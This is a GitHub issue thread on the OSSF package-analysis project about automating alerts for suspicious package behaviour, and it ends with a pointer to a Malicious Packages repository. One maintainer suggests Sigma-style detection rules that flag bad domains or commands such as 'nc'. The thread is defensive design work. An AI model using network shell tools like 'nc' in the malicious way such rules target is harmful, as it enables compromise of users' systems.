package-analysis icon indicating copy to clipboard operation
package-analysis copied to clipboard
verified publisher icon ossf

how to automate analyze result ?

Open ultramaxim opened this issue 3 years ago • 2 comments

do you have any rules or something else to automatically alert if there is suspicious activity?

ultramaxim avatar May 11 '22 06:05 ultramaxim

Hi there!

Currently we're focused on collecting high quality raw signals and we don't have any automated rules to detect suspicious activity yet. Contributions are welcome :)

oliverchang avatar May 11 '22 06:05 oliverchang

Currently we manually query the BigQuery dataset directly using SQL to hunt for suspicious activity.

What I had in mind here is using something like Sigma rules (similar to Yara/Snort rules) to match against analysis results (treating them as "log entries"). A (public) PubSub topic could be used to signal that new analysis results are ready.

For example, rules could be added to match against bad domains, or commands (e.g. 'nc') could be used to flag the most obvious examples of malware.

Output could be another BigQuery table, a PubSub queue, a log, etc.

Did you have any thoughts or experience in this area?

calebbrown avatar May 11 '22 22:05 calebbrown

Hi @ultramaxim!

We've started a new repo to publish data on packages that are detected as suspicious, called Malicious Packages.

Please note that the repo is still a work in progress, and there is no data yet, but it is coming :)

You are also welcome to get involved - see the repo readme for more details.

I'll close this issue for now, but feel free to open a new issue if you have further questions!

maxfisher-g avatar Jun 15 '23 01:06 maxfisher-g